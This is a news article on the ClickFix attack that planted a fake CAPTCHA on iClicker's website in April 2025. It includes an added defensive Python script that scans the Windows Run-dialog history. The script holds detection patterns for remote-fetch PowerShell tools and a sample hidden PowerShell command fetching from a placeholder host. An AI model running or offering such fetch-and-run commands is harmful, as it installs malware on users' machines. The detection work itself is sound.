iClicker Website Hacked with Fake CAPTCHA in ClickFix Attack

Popular student engagement platform iClicker’s website was compromised with a ClickFix attack. A fake “I’m not a robot” check tricked users into installing malware. Learn who was affected and how to stay safe.
iClicker, a popular digital classroom tool used in many universities, was recently targeted by hackers. The tool, owned by Macmillan, helps teachers track attendance and ask students questions in class. Millions of students and thousands of teachers across the US, including at the University of Michigan and the University of Florida, use iClicker.
According to an advisory from the University of Michigan’s Safe Computing Team, between April 12th and 16th, 2025, the iClicker website was compromised and showed visitors a fake CAPTCHA asking them to click “I’m not a robot.”
When a Windows user clicked on this fake check, a hidden PowerShell command was copied to their clipboard. They were then prompted to open the Windows Run dialog (by pressing the Windows key and the letter ‘R’ at the same time), paste this command (by pressing Ctrl and ‘V’), and then press Enter. Doing this would run the hidden command.

This trick, known as a ClickFix attack, is a way to fool people into downloading malware. A Reddit user tested this command on Any.Run and found it would connect to a server on the internet to download another set of instructions, depending on who was visiting the website. If it was a real person using a regular computer, the instructions would download malware, which could give the attacker complete control over the device.
This malware was likely designed to steal personal information, such as usernames, passwords, credit card details, and even cryptocurrency wallet information stored on the computer.
In case the visitor was a system used by security experts to analyze malware, the hidden command would instead download a harmless program from Microsoft so that the attackers could evade detection.
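Because the victim pastes the command into the Run dialog, it can leave a trace: Windows keeps Run-dialog history per user in the `RunMRU` registry key. The following added example (not from iClicker, the University of Michigan advisory or Hackread.com) triages that history for entries shaped like the attack described above. The indicator patterns and the sample entries are assumptions constructed for illustration, not the command used in this incident.

```python
import re

# Illustrative heuristics (assumptions): a script host launched from the Run
# dialog together with a hidden window, an encoded command or a remote fetch.
INDICATORS = {
    "script_host": re.compile(r"\b(powershell|pwsh|mshta|cmd)(\.exe)?\b", re.I),
    "hidden_window": re.compile(r"-w[a-z]*\s+(h[a-z]*|1)\b", re.I),
    "encoded_command": re.compile(r"-e[a-z]*\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_fetch": re.compile(
        r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|bitsadmin)\b",
        re.I),
}

def read_runmru():
    """Read the current user's Run-dialog history (Windows only)."""
    import winreg
    path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU"
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, path) as key:
        count = winreg.QueryInfoKey(key)[1]  # number of values under the key
        rows = (winreg.EnumValue(key, i) for i in range(count))
        return {name: str(data) for name, data, _ in rows}

def triage_run_history(values):
    """Return (value name, command, matched indicators) for suspicious entries."""
    findings = []
    for name, data in values.items():
        if name.lower() == "mrulist":  # ordering string, not a command
            continue
        # RunMRU stores each command with a trailing "\1" marker.
        command = data[:-2] if data.endswith("\\1") else data
        hits = sorted(k for k, rx in INDICATORS.items() if rx.search(command))
        # A script host on its own is ordinary use; require a second signal.
        if "script_host" in hits and len(hits) >= 2:
            findings.append((name, command, hits))
    return findings

# Constructed sample data; example.invalid is a reserved, non-resolving name.
SAMPLE_RUNMRU = {
    "MRUList": "cba",
    "a": "notepad\\1",
    "b": "powershell\\1",
    "c": 'powershell -w hidden -c "irm https://example.invalid/placeholder"\\1',
}

if __name__ == "__main__":
    for name, command, hits in triage_run_history(SAMPLE_RUNMRU):
        print(f"[!] RunMRU value {name!r}: {command}\n    indicators: {', '.join(hits)}")
```

On a Windows host, pass `read_runmru()` instead of the sample dictionary. An empty result does not clear a machine, since the history can be deleted or disabled.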
In its security bulletin, iClicker confirmed that its main system and user information were safe, explaining that a third party put a fake security check on their website before users logged in.
As previously reported by Hackread.com, ClickFix has become a growing concern in the cybersecurity world. In March 2024, we reported the increasing use of ClickFix attacks by cybercrime groups like TA571 and ClearFake. Later, in October 2024, security firm Sekoia observed more ClickFix attacks using fake Google Meet, Chrome, and Facebook pages to spread malware.
Recently, in April 2025, Hackread.com reported that government-backed hacking groups from countries like North Korea, Iran, and Russia used this method in their spying operations. Hackread.com has also published a detailed blog post on how to protect yourself from ClickFix attacks.
iClicker advises anyone who visited their website between April 12th and 16th and clicked on the fake security check to immediately change all the passwords saved on their computer, including the iClicker password, and to use a password manager to maximize account security. People who only used the iClicker mobile app or did not see the fake security check were safe from this particular attack.
Debbie Gordon, CEO and Founder at Cloud Range, commented on the development, stating, “This incident shows how easily attackers can turn a simple user interaction, like clicking a CAPTCHA, into a full compromise.”
“The real question is: how quickly can your team detect and contain it? That’s the essence of incident response readiness. Simulation-based training gives defenders the muscle memory they need to spot behavioural red flags, investigate effectively, and coordinate containment actions in real-time before small lapses become major breaches.”
HackRead